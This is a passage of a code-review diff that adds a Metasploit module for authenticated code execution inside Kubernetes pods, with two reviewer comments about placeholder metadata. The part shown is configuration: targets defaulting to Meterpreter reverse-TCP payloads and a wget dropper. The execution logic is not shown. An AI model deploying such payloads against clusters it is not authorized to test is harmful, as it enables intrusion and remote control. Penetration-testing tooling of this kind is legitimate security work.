modules/exploits/multi/kubernetes/exec.rb

```diff
@@ -0,0 +1,321 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::PostMixin
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kubernetes authenticated code execution',
+        'Description' => %q{
+          Execute a payload within a Kubernetes pod.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'alanfoster',
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+        'Notes' => {
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # the Linux Dropper target uses the command stager which writes to disk
+            CONFIG_CHANGES, # the Kubernetes configuration is changed if a new pod is created
+            IOC_IN_LOGS # a log event is generated if a new pod is created
+          ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'Targets' => [
+          [
+            'Interactive WebSocket',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_stream,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd_interact',
+                  'ConnectionType' => 'find'
+                }
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'Type' => :nix_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => 'wget',
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Python',
+            {
+              'Arch' => [ARCH_PYTHON],
+              'Platform' => 'python',
+              'Type' => :python,
+              'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2000-01-01', # FIXME: find an actual disclosure date
```

Comment:
Still some junk from my poc, sorry 😄

Reply:
Not really sure what else to put in here, so I'll just go with today's date since it's when the module was released.